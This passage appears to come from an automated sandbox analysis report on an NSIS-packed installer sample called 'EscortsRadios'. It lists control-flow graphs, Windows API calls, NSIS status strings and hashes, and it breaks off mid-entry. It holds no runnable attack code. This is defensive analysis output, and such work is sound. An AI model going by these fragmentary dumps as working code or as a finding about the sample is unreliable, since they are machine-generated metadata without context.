                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                  • API String ID: 2110491804-2409696222
                                                  • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                  • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                  APIs
                                                  • #17.COMCTL32 ref: 004038A2
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                  • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                  • API String ID: 2435955865-239407132
                                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 787 4074bb-4074c0 788 4074c2-4074ef 787->788 789 40752f-407547 787->789 791 4074f1-4074f4 788->791 792 4074f6-4074fa 788->792 790 407aeb-407aff 789->790 796 407b01-407b17 790->796 797 407b19-407b2c 790->797 793 407506-407509 791->793 794 407502 792->794 795 4074fc-407500 792->795 798 407527-40752a 793->798 799 40750b-407514 793->799 794->793 795->793 800 407b33-407b3a 796->800 797->800 803 4076f6-407713 798->803 804 407516 799->804 805 407519-407525 799->805 801 407b61-407c68 800->801 802 407b3c-407b40 800->802 818 407350 801->818 819 407cec 801->819 807 407b46-407b5e 802->807 808 407ccd-407cd4 802->808 810 407715-407729 803->810 811 40772b-40773e 803->811 804->805 806 407589-4075b6 805->806 814 4075d2-4075ec 806->814 815 4075b8-4075d0 806->815 807->801 812 407cdd-407cea 808->812 816 407741-40774b 810->816 811->816 817 407cef-407cf6 812->817 820 4075f0-4075fa 814->820 815->820 821 40774d 816->821 822 4076ee-4076f4 816->822 823 407357-40735b 818->823 824 40749b-4074b6 818->824 825 40746d-407471 818->825 826 4073ff-407403 818->826 819->817 829 407600 820->829 830 407571-407577 820->830 831 407845-4078a1 821->831 832 4076c9-4076cd 821->832 822->803 828 407692-40769c 822->828 823->812 833 407361-40736e 823->833 824->790 838 407c76-407c7d 825->838 839 407477-40748b 825->839 844 407409-407420 826->844 845 407c6d-407c74 826->845 834 4076a2-4076c4 828->834 835 407c9a-407ca1 828->835 847 407556-40756e 829->847 848 407c7f-407c86 829->848 836 40762a-407630 830->836 837 40757d-407583 830->837 831->790 840 407c91-407c98 832->840 841 4076d3-4076eb 832->841 833->819 849 407374-4073ba 833->849 834->831 835->812 850 40768e 836->850 851 407632-40764f 836->851 837->806 837->850 838->812 846 40748e-407496 839->846 840->812 841->822 852 407423-407427 844->852 845->812 846->825 856 407498 846->856 847->830 848->812 854 4073e2-4073e4 849->854 855 4073bc-4073c0 849->855 850->828 857 407651-407665 851->857 858 407667-40767a 851->858 852->826 853 407429-40742f 852->853 860 407431-407438 853->860 861 407459-40746b 853->861 864 4073f5-4073fd 854->864 865 4073e6-4073f3 854->865 862 4073c2-4073c5 GlobalFree 855->862 863 4073cb-4073d9 GlobalAlloc 855->863 856->824 859 40767d-407687 857->859 858->859 859->836 866 407689 859->866 867 407443-407453 GlobalAlloc 860->867 868 40743a-40743d GlobalFree 860->868 861->846 862->863 863->819 869 4073df 863->869 864->852 865->864 865->865 871 407c88-407c8f 866->871 872 40760f-407627 866->872 867->819 867->861 868->867 869->854 871->812 872->836
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                  • DestroyWindow.USER32 ref: 004054E6
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: @rD
                                                  • API String ID: 3282139019-3814967855
                                                  • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                  • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                  APIs
                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                  • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                  • ShowWindow.USER32(?), ref: 00401753
                                                  • ShowWindow.USER32(?), ref: 00401767
                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                  Strings
                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                  • Jump: %d, xrefs: 00401602
                                                  • Aborting: "%s", xrefs: 0040161D
                                                  • BringToFront, xrefs: 004016BD
                                                  • Rename failed: %s, xrefs: 0040194B
                                                  • Sleep(%d), xrefs: 0040169D
                                                  • detailprint: %s, xrefs: 00401679
                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                  • Rename: %s, xrefs: 004018F8
                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                  • Call: %d, xrefs: 0040165A
                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                  • Rename on reboot: %s, xrefs: 00401943
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                  • API String ID: 2872004960-3619442763
                                                  • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
